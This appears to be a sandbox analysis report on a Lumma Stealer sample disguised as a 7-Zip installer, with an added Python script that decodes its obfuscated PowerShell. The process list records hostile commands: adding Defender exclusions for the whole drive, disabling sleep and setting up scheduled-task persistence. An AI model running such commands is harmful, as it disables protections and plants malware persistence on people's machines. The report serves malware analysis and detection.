Analysis Overview
SHA256
7da7d152162fd0a796b93b2f28715c50b577ac71a1107b668dc6b2834a5602ba
Threat Level: Known bad
The file [email protected] was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Power Settings
Suspicious use of SetThreadContext
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
Unsigned PE
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Modifies data under HKEY_USERS
Views/modifies file attributes
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-05 16:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-05 16:09
Reported
2024-07-05 16:15
Platform
win10-20240404-en
Max time kernel
210s
Max time network
211s
Command Line
Signatures
Lumma Stealer
Downloads MZ/PE file
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4180 set thread context of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\[email protected] | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz-cyrl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\es.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\et.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\id.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\it.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ar.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\da.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\br.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\is.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kaa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\cs.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hi.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ne.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\History.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-tw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\af.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\cy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\io.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ba.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\readme.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.chm | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\an.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\co.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\be.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ro.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ca.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\el.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip32.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
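The PowerShell signature above is raised by the `-EncodedCommand` invocation recorded in the Processes section of this run: the Base64 is UTF-16LE script text padded with random `<# ... #>` block comments, and once those are stripped it adds the user profile and the whole system drive to Microsoft Defender's exclusion list before the installer runs. The following is an added Python example, not part of the sandbox report or of the sample, that pulls the blob out of a cmd.exe command line, decodes it, strips the comment padding and reports the excluded paths. The command line constant is copied from the report; the regular expressions and function names are this example's own.

```python
import base64
import re
from typing import Optional

# cmd.exe command line recorded in the behavioral2 run (copied from the Processes section).
REPORTED_CMDLINE = (
    '"cmd.exe" /C powershell -EncodedCommand "'
    "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA=="
    '" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0'
    " & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off"
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the spellings seen in the wild.
ENCODED_FLAG = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]+)', re.IGNORECASE)
# <# ... #> block comments carry no code; the sample sprinkles random ones between tokens.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
# Argument of -ExclusionPath up to the next -Parameter or end of line.
EXCLUSION_PATH = re.compile(r"-ExclusionPath\s+(.+?)(?=\s+-\w|\s*$)", re.IGNORECASE)


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the Base64 argument of -EncodedCommand (or a prefix of it), if present."""
    m = ENCODED_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is Base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop <# ... #> comments and collapse the whitespace they leave behind."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def find_defender_exclusions(script: str) -> list:
    """Paths passed to Add-MpPreference -ExclusionPath, with an @( ... ) array literal unwrapped."""
    if not re.search(r"\bAdd-MpPreference\b", script, re.IGNORECASE):
        return []
    m = EXCLUSION_PATH.search(script)
    if not m:
        return []
    arg = m.group(1).strip()
    if arg.startswith("@(") and arg.endswith(")"):
        arg = arg[2:-1]
    return [p.strip().strip("'\"") for p in arg.split(",") if p.strip()]


def triage(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and summarise what it does."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False}
    decoded = decode_encoded_command(b64)
    script = strip_block_comments(decoded)
    return {
        "encoded": True,
        "junk_comments": len(BLOCK_COMMENT.findall(decoded)),
        "script": script,
        "defender_exclusions": find_defender_exclusions(script),
    }


if __name__ == "__main__":
    result = triage(REPORTED_CMDLINE)
    print(result["script"])
    print("Defender exclusions added:", result["defender_exclusions"])
```

Note that the comment padding is why a plain string match on the decoded text for `Add-MpPreference -ExclusionPath` can miss: the tokens are separated by `<#2RxWTsd#>`-style noise, so normalise first and match second. The same decode step applies to any `-e`/`-enc` variant, which is why the flag regex accepts the prefixes.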
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133646696155449468" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
"C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1404753551733818025492326517 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
"Installer.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA=="
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff932369758,0x7ff932369768,0x7ff932369778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
